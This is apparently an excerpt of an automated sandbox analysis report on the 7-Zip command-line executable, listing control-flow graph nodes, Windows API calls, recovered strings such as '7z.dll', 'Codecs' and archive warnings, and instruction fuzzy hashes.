                                                                                                                                                                                                                                          control_flow_graph 2752 3170c8-3170e4 call 317d4c 2754 3170e9-3170ec 2752->2754 2755 3170f9-317103 call 319d84 2754->2755 2756 3170ee-3170f0 2754->2756 2761 317105-317107 2755->2761 2762 31710c-317136 call 319ed8 call 313274 call 31376c 2755->2762 2756->2755 2757 3170f2-3170f4 2756->2757 2759 317449-317458 2757->2759 2761->2759 2769 317138-317141 2762->2769 2770 31715b-317175 call 313314 2762->2770 2769->2770 2771 317143-317145 2769->2771 2777 31717a-317186 call 31a170 2770->2777 2773 317147 2771->2773 2774 31714c-317155 2771->2774 2776 3173f1-3173fe free 2773->2776 2774->2770 2776->2759 2780 317188-317195 CreateDirectoryW 2777->2780 2781 3171aa-3171ac 2777->2781 2782 317360-317364 2780->2782 2783 31719b-3171a4 GetLastError 2780->2783 2784 3171b2-3171d2 call 313208 call 31a7ec 2781->2784 2785 31727d-317286 GetLastError 2781->2785 2789 317366-317379 call 319ab0 2782->2789 2790 3173c9-3173e1 free * 2 2782->2790 2783->2781 2783->2785 2807 317273-317278 free 2784->2807 2808 3171d8-3171e7 CreateDirectoryW 2784->2808 2787 3172e4-3172ed GetLastError 2785->2787 2788 317288-3172b5 call 317d28 call 313208 call 317ebc 2785->2788 2794 3173e3-3173ee free 2787->2794 2795 3172f3-317301 call 31376c 2787->2795 2828 3172b7-3172c4 free 2788->2828 2829 3172c6-3172db free 2788->2829 2802 317381 2789->2802 2803 31737b-31737f 2789->2803 2790->2759 2794->2776 2805 317432-317447 free * 2 2795->2805 2806 317307-317309 2795->2806 2810 317385-3173a3 call 313460 call 316c84 2802->2810 2803->2810 2805->2759 2806->2805 2811 31730f-317316 2806->2811 2807->2785 2812 317356-31735b free 2808->2812 2813 3171ed-3171f6 GetLastError 2808->2813 2834 3173a5-3173a9 2810->2834 2835 3173ad-3173c4 free * 2 2810->2835 2817 317318-31731c 2811->2817 2818 31732c-317332 2811->2818 2812->2782 2819 317207-317230 call 317d28 call 313208 call 317ebc 2813->2819 2820 3171f8-317202 free 2813->2820 2823 317400-317417 free * 2 2817->2823 2824 317322-317326 2817->2824 2825 317419-317430 free * 2 2818->2825 2826 317338-31733c 2818->2826 2841 317232-31724a free * 2 2819->2841 2842 31724f-317271 free * 2 2819->2842 2820->2787 2823->2759 2824->2818 2824->2823 2825->2759 2826->2777 2831 317342-317351 2826->2831 2828->2787 2833 3172e0-3172e2 2829->2833 2831->2777 2833->2782 2833->2787 2834->2789 2837 3173ab 2834->2837 2835->2759 2837->2790 2841->2787 2842->2833
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00317D4C: GetFileAttributesW.KERNELBASE ref: 00317D6E
                                                                                                                                                                                                                                            • Part of subcall function 00317D4C: GetFileAttributesW.KERNEL32 ref: 00317DA5
                                                                                                                                                                                                                                            • Part of subcall function 00317D4C: free.MSVCRT ref: 00317DB2
                                                                                                                                                                                                                                          • free.MSVCRT ref: 003173F6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFilefree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1936811914-0
                                                                                                                                                                                                                                          • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                          • Instruction ID: 49f564f88ccfc4769d365248d9cbc92636c7cd4651159d9ef8e46b1e33492ca6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1981581221C54196CA2AEF22E4512EF6331FBCE744F481522FA4E87B65DE38C9D6D740

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2843 317ebc-317ee3 call 319b68 2846 317ee9-317f26 call 31339c call 319ce4 2843->2846 2847 317fca-317fd6 call 319ddc 2843->2847 2859 317f28-317f2c 2846->2859 2860 317f8c-317fa4 call 3191dc 2846->2860 2853 318253-31828a call 319d0c call 319b30 2847->2853 2854 317fdc-317fe4 2847->2854 2870 318306-31830b 2853->2870 2871 31828c-318294 2853->2871 2854->2853 2857 317fea-31800c call 313274 * 2 2854->2857 2880 31801b-318020 2857->2880 2881 31800e-318017 2857->2881 2859->2860 2863 317f2e-317f77 call 31abb0 2859->2863 2874 317fa6 2860->2874 2875 317fa8-317fac 2860->2875 2863->2860 2879 317f79-317f87 2863->2879 2876 318318-31831c 2870->2876 2877 31830d-318312 2870->2877 2871->2870 2878 318296-3182a5 call 317d4c 2871->2878 2882 317fb9-317fc5 call 3189d8 2874->2882 2883 317fb6 2875->2883 2884 317fae-317fb3 2875->2884 2887 318377-318381 call 319c80 2876->2887 2888 31831e-318330 call 317d4c 2876->2888 2877->2876 2885 3184f2-318500 call 317978 2877->2885 2878->2885 2904 3182ab-3182b2 2878->2904 2890 318519-318524 2879->2890 2891 318040-31804c call 313670 2880->2891 2892 318022-31803e call 312880 2880->2892 2881->2880 2882->2890 2883->2882 2884->2883 2905 318505-318506 2885->2905 2887->2885 2908 318387-318396 2887->2908 2888->2885 2907 318336-31833d 2888->2907 2901 318051-318062 call 319ce4 2891->2901 2892->2891 2892->2901 2916 3180b1-3180bb call 317ebc 2901->2916 2917 318064-318067 2901->2917 2904->2885 2909 3182b8-3182eb call 31339c 2904->2909 2910 318509-318511 call 31794c 2905->2910 2907->2885 2912 318343-318372 2907->2912 2908->2885 2913 31839c-3183a6 call 319ab0 2908->2913 2924 3182ed-3182f8 2909->2924 2925 3182fc-318301 2909->2925 2920 318516 2910->2920 2912->2910 2913->2885 2930 3183ac-3183c2 call 313274 2913->2930 2928 3180c1-318108 call 313314 call 313208 call 317ce0 2916->2928 2932 31823e-31824e free * 2 2916->2932 2921 318075-3180a3 2917->2921 2922 318069-31806c 2917->2922 2920->2890 2921->2928 2929 3180a5-3180af call 313404 2921->2929 2922->2916 2927 31806e-318073 2922->2927 2924->2925 2925->2910 2927->2916 2927->2921 2953 31815a-318185 free * 2 call 31794c free 2928->2953 2954 31810a-318111 2928->2954 2929->2928 2939 3183d2-3183f2 2930->2939 2940 3183c4-3183ce call 312fec 2930->2940 2932->2853 2944 318402-318437 call 317978 2939->2944 2945 3183f4-3183fe call 312fec 2939->2945 2940->2939 2955 318484-31849d call 317d4c 2944->2955 2956 318439-318457 wcscmp 2944->2956 2945->2944 2968 31822d-318239 free 2953->2968 2959 318113-318124 call 312748 2954->2959 2960 31818a-3181c1 SetLastError free * 2 call 31794c free 2954->2960 2969 3184b3-3184f0 call 31339c free 2955->2969 2970 31849f-3184a1 2955->2970 2961 318459-318477 call 31339c free 2956->2961 2962 31847c 2956->2962 2977 3181c3-3181ca 2959->2977 2978 31812a-318158 free call 313208 call 317ce0 2959->2978 2960->2968 2961->2910 2962->2955 2968->2890 2969->2910 2974 3184a3-3184a5 2970->2974 2975 3184a7-3184b1 free 2970->2975 2974->2969 2974->2975 2975->2885 2979 3181e0-31822a call 31362c free * 2 call 31794c free 2977->2979 2980 3181cc-3181d1 2977->2980 2978->2953 2978->2954 2979->2968 2980->2979 2983 3181d3-3181dc 2980->2983 2983->2979
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0031812F
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0031816A
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0031817F
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00318232
                                                                                                                                                                                                                                            • Part of subcall function 0031ABB0: GetModuleHandleW.KERNEL32 ref: 0031ABD1
                                                                                                                                                                                                                                            • Part of subcall function 0031ABB0: GetProcAddress.KERNEL32 ref: 0031ABE1
                                                                                                                                                                                                                                            • Part of subcall function 0031ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0031AC32
                                                                                                                                                                                                                                          • SetLastError.KERNEL32 ref: 0031818F
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0031819B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 003181A6
                                                                                                                                                                                                                                          • free.MSVCRT ref: 003181BB
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00318243
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0031824E
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0031815F
                                                                                                                                                                                                                                            • Part of subcall function 0031339C: free.MSVCRT ref: 003133D7
                                                                                                                                                                                                                                            • Part of subcall function 0031339C: memmove.MSVCRT(00000000,?,?,00000000,003110A8), ref: 003133F2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                                                                                                                          • String ID: :$:$DATA$\
                                                                                                                                                                                                                                          • API String ID: 4130059181-1004618218
                                                                                                                                                                                                                                          • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                          • Instruction ID: 22ffc46e13067304baa7790248a948340896eab4e9a0245d5288fe8169243189
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33027E32505680AACB2ADF29D4902EEB770F79D350F444226E79E4BB68DF34C5E6CB44

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2991 353e84-353eb5 2992 3541e8 2991->2992 2993 353ebb 2991->2993 2995 3541ea-3541fd 2992->2995 2994 353ebe-353efa fputs call 352e24 2993->2994 2998 353f51-353f59 2994->2998 2999 353efc-353f03 2994->2999 3000 353f64-353f6f 2998->3000 3001 353f5b-353f62 2998->3001 3002 353f05-353f1d fputs call 312300 2999->3002 3003 353f1f-353f4c call 313274 call 3530cc free 2999->3003 3004 353f73-353f9e call 352e24 call 353148 3000->3004 3001->3004 3002->2998 3003->2998 3015 353fa0-353fce fputs * 2 call 312640 call 312300 3004->3015 3016 353fd3-353fe3 call 353034 3004->3016 3015->3016 3020 353fe8-353fea 3016->3020 3020->2995 3022 353ff0-353ff7 3020->3022 3023 35402c-35403c 3022->3023 3024 353ff9-354027 fputs * 2 call 3126a0 call 312300 3022->3024 3023->2995 3029 354042-354048 3023->3029 3024->3023 3030 3540af-3540b9 3029->3030 3031 35404a-354079 3029->3031 3032 35419d-3541b1 3030->3032 3033 3540bf-3540e0 fputs 3030->3033 3037 35407f-354096 call 353034 3031->3037 3038 3541b9 3031->3038 3032->2994 3034 3541b7 3032->3034 3033->3032 3040 3540e6-3540fc 3033->3040 3034->2992 3044 35409c-3540ad SysFreeString 3037->3044 3045 3541bb 3037->3045 3039 3541bd-3541ca SysFreeString 3038->3039 3039->2995 3040->3032 3042 354102-354133 3040->3042 3047 3541cc 3042->3047 3048 354139-354162 3042->3048 3044->3030 3044->3031 3045->3039 3049 3541d9-3541e6 SysFreeString 3047->3049 3051 354164-354197 call 352ecc call 31ae2c SysFreeString 3048->3051 3052 3541ce-3541d8 call 31ae2c 3048->3052 3049->2995 3051->3032 3051->3042 3052->3049
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$FreeString$fputcfree
                                                                                                                                                                                                                                          • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                                                                                                                          • API String ID: 2701146716-1919703766
                                                                                                                                                                                                                                          • Opcode ID: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                                                                                                                          • Instruction ID: f175f8ca9b158940db9a94f87344b72db8a9251bb8672f7d7ea73de9680dd4b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591AF3A214E4192DB16DF22E950B6E7334F794BC9F015122EE5B47B24DF38CA99C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3059 31f71c-31f74e call 311610 3062 31f750-31f773 call 3302a0 _CxxThrowException 3059->3062 3063 31f774-31f7c2 _isatty * 3 3059->3063 3062->3063 3065 31f7d4 3063->3065 3066 31f7c4-31f7c8 3063->3066 3067 31f7d9-31f81c 3065->3067 3066->3065 3069 31f7ca-31f7ce 3066->3069 3071 31f82a 3067->3071 3072 31f81e-31f822 3067->3072 3069->3065 3070 31f7d0-31f7d2 3069->3070 3070->3067 3074 31f830-31f834 3071->3074 3072->3071 3073 31f824-31f828 3072->3073 3073->3071 3073->3074 3075 31f836 3074->3075 3076 31f83c-31f846 3074->3076 3075->3076 3077 31f854-31f85e 3076->3077 3078 31f848-31f84e 3076->3078 3079 31f860-31f866 3077->3079 3080 31f86c-31f876 3077->3080 3078->3077 3079->3080 3081 31f884-31f88e 3080->3081 3082 31f878-31f87e 3080->3082 3083 31f890-31f89d 3081->3083 3084 31f8f3-31f8fd 3081->3084 3082->3081 3085 31f8ab-31f8be call 31ed34 3083->3085 3086 31f89f-31f8a9 3083->3086 3087 31f91a-31f931 call 31ac74 * 2 3084->3087 3088 31f8ff-31f917 3084->3088 3093 31f8c0-31f8e5 call 3302a0 _CxxThrowException 3085->3093 3094 31f8e6-31f8ed 3085->3094 3086->3084 3097 31f936-31f940 3087->3097 3088->3087 3093->3094 3094->3084 3099 31f946-31f95c 3097->3099 3100 31f9dd-31f9e7 3097->3100 3101 31f965-31f977 wcscmp 3099->3101 3102 31f95e-31f963 3099->3102 3103 31fa94-31fa9c 3100->3103 3104 31f9ed-31f9fa 3100->3104 3105 31f9bb-31f9c2 call 31ad0c 3101->3105 3106 31f979-31f98c call 31ed34 3101->3106 3102->3105 3104->3103 3107 31fa00-31fa1c call 312bc8 call 312d34 3104->3107 3105->3100 3117 31f9c4-31f9d7 call 35d4c0 call 31ac74 3105->3117 3114 31f9b4 3106->3114 3115 31f98e-31f9b3 call 3302a0 _CxxThrowException 3106->3115 3122 31fa4f-31fa74 call 3302a0 _CxxThrowException 3107->3122 3123 31fa1e-31fa3b call 313f78 3107->3123 3114->3105 3115->3114 3117->3100 3131 31fa75-31fa8f GetCurrentProcess SetProcessAffinityMask free 3122->3131 3132 31fa49-31fa4d 3123->3132 3133 31fa3d-31fa46 3123->3133 3131->3103 3132->3122 3132->3131 3133->3132
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Unsupported switch postfix -bb, xrefs: 0031F8C3
                                                                                                                                                                                                                                          • Unsupported switch postfix -stm, xrefs: 0031FA52
                                                                                                                                                                                                                                          • SeLockMemoryPrivilege, xrefs: 0031F9CB
                                                                                                                                                                                                                                          • SeRestorePrivilege, xrefs: 0031F91C
                                                                                                                                                                                                                                          • Unsupported switch postfix for -slp, xrefs: 0031F991
                                                                                                                                                                                                                                          • SeCreateSymbolicLinkPrivilege, xrefs: 0031F92A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                                                                                          • API String ID: 1961088698-2328792591
                                                                                                                                                                                                                                          • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                          • Instruction ID: 59d5547fdae227d07632e27daa5d7398a07ce55b975bb029899ebc71f6a667a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8A19E73608AC499EB27DF25E4903ED7B20E789B94F598176DB8C47765CF28CA85C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3134 35a448-35a455 3135 35a457-35a45f 3134->3135 3136 35a49c-35a4a4 3134->3136 3135->3136 3137 35a461-35a495 call 312300 fputs call 3126a0 call 312300 3135->3137 3138 35a4f4 3136->3138 3139 35a4a6-35a4a9 3136->3139 3137->3136 3141 35a4fc-35a50a 3138->3141 3142 35a4df-35a4e5 3139->3142 3143 35a4ab-35a4da call 312300 fputs call 3126a0 call 312300 3139->3143 3145 35a53d-35a559 free 3141->3145 3146 35a50c 3141->3146 3142->3141 3143->3142 3150 35a58c-35a5b5 free 3145->3150 3151 35a55b 3145->3151 3149 35a510-35a526 3146->3149 3154 35a538-35a53b 3149->3154 3155 35a528-35a533 free * 2 3149->3155 3162 35a5c5-35a5c8 3150->3162 3163 35a5b7-35a5be 3150->3163 3156 35a55f-35a575 3151->3156 3154->3145 3154->3149 3155->3154 3160 35a587-35a58a 3156->3160 3161 35a577-35a582 free * 2 3156->3161 3160->3150 3160->3156 3161->3160 3167 35a5e7-35a603 free 3162->3167 3168 35a5ca-35a5e6 _CxxThrowException 3162->3168 3163->3162 3165 35a5c0 call 3566a8 3163->3165 3165->3162 3171 35a605 3167->3171 3172 35a626-35a637 free call 33a13c 3167->3172 3168->3167 3173 35a609-35a624 free 3171->3173 3175 35a63c-35a675 call 357080 call 31182c call 357f50 3172->3175 3173->3172 3173->3173 3182 35a677 3175->3182 3183 35a6a8-35a6c9 free 3175->3183 3184 35a67b-35a691 3182->3184 3186 35a6a3-35a6a6 3184->3186 3187 35a693-35a69e free * 2 3184->3187 3186->3183 3186->3184 3187->3186
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                                                                                                                          • String ID: Errors: $Warnings:
                                                                                                                                                                                                                                          • API String ID: 437615013-2345102087
                                                                                                                                                                                                                                          • Opcode ID: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                                                                                                                          • Instruction ID: 15e6609202a1b0c34158314d2e9bfafbd0ad5946bd96780556d87d4f97329b15
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51C762314DC081C936EB25E8907EEA361F786791F454722DE9D1BB69DF38C4DAC701

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3188 3383c8-33841d call 316570 call 3131c0 call 318624 3195 338482 3188->3195 3196 33841f-33844c call 3131c0 call 3186dc 3188->3196 3197 338485-338489 3195->3197 3196->3195 3210 33844e-33847b call 3131c0 call 3186dc 3196->3210 3199 33848b-338498 free 3197->3199 3200 338499-33849d 3197->3200 3199->3200 3202 33849f-3384ac free 3200->3202 3203 3384ad-3384b1 3200->3203 3202->3203 3205 3384b3-3384b8 free 3203->3205 3206 3384bd-3384c0 3203->3206 3205->3206 3208 3384c6-3384ee call 313208 call 338290 3206->3208 3209 3385ef-338607 call 313314 free 3206->3209 3222 3384f0-338516 call 313314 free * 2 3208->3222 3223 33851b-338538 call 338290 3208->3223 3217 33860a-338611 3209->3217 3210->3195 3224 33847d-338480 3210->3224 3222->3217 3229 338565-33857b call 338290 3223->3229 3230 33853a-338560 call 313314 free * 2 3223->3230 3224->3197 3235 3385a5-3385bb call 338290 3229->3235 3236 33857d-3385a3 call 313314 free * 2 3229->3236 3230->3217 3241 3385e5-3385ea free 3235->3241 3242 3385bd-3385e3 call 313314 free * 2 3235->3242 3236->3217 3241->3209 3242->3217
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                                                                                                                          • API String ID: 1534225298-3804457719
                                                                                                                                                                                                                                          • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                          • Instruction ID: 80ded132ba42347bc73c1c2222cceabbc469c2b1a39798ffe56af122a73e0c41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF518562204A4590DE26EF15E8913DAA720D7CB7E4F541222BB5E5B7B9CF28C6CAC704

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3245 33ab74-33aba4 3246 33abd3-33abf5 3245->3246 3247 33aba6 3245->3247 3249 33ae31-33ae78 call 3383c8 call 3131c0 call 33a7fc free 3246->3249 3250 33abfb 3246->3250 3248 33abaa-33abbc 3247->3248 3251 33abce-33abd1 3248->3251 3252 33abbe-33abc9 call 3394a8 free 3248->3252 3268 33ae7a 3249->3268 3269 33ae7f-33ae87 3249->3269 3253 33ac02-33acba call 313208 call 313518 call 313208 * 2 3250->3253 3251->3246 3251->3248 3252->3251 3277 33acc6-33accd 3253->3277 3278 33acbc-33acc1 call 313518 3253->3278 3271 33af7a-33af99 free 3268->3271 3272 33ae99-33aeca call 3131c0 call 33a9fc free 3269->3272 3273 33ae89-33ae94 call 31339c 3269->3273 3288 33aed1-33aeee call 3131c0 call 33a9fc 3272->3288 3289 33aecc 3272->3289 3273->3272 3281 33acd9-33ad35 call 339d98 free * 2 3277->3281 3282 33accf-33acd4 call 313518 3277->3282 3278->3277 3290 33ad51-33ad61 call 312130 3281->3290 3291 33ad37-33ad4c call 33a034 3281->3291 3282->3281 3301 33aef3-33af02 free 3288->3301 3289->3271 3299 33ad63-33ad6a 3290->3299 3300 33ad6c 3290->3300 3302 33addd-33adf2 call 312130 3291->3302 3304 33ad6f-33ad8b call 31b8f0 3299->3304 3300->3304 3305 33af06-33af10 3301->3305 3306 33af04 3301->3306 3311 33ae03 3302->3311 3312 33adf4-33ae01 call 339af0 3302->3312 3317 33adbd-33adc0 3304->3317 3318 33ad8d-33ad93 3304->3318 3309 33af12-33af16 3305->3309 3310 33af18-33af1b 3305->3310 3306->3271 3314 33af2a-33af2e 3309->3314 3310->3314 3315 33af1d-33af24 3310->3315 3319 33ae06-33ae2b call 31b8f0 call 3394a8 3311->3319 3312->3319 3321 33af30-33af36 3314->3321 3322 33af77 3314->3322 3315->3314 3320 33af26 3315->3320 3328 33adc2-33add3 memmove 3317->3328 3329 33adda 3317->3329 3324 33ada1-33adac 3318->3324 3325 33ad95-33ad9a free 3318->3325 3319->3249 3319->3253 3320->3314 3321->3322 3327 33af38 3321->3327 3322->3271 3330 33add5-33add8 3324->3330 3331 33adae-33adb9 call 312130 3324->3331 3325->3324 3333 33af3b-33af5a GetProcAddress 3327->3333 3328->3302 3329->3302 3330->3302 3331->3317 3336 33af66-33af6f 3333->3336 3337 33af5c-33af64 3333->3337 3336->3333 3338 33af71 3336->3338 3337->3336 3342 33af73-33af75 3337->3342 3338->3322 3342->3271
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033ABC9
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033ACF3
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033ACFE
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033AD95
                                                                                                                                                                                                                                          • memmove.MSVCRT(?), ref: 0033ADCB
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033AE70
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033AF7F
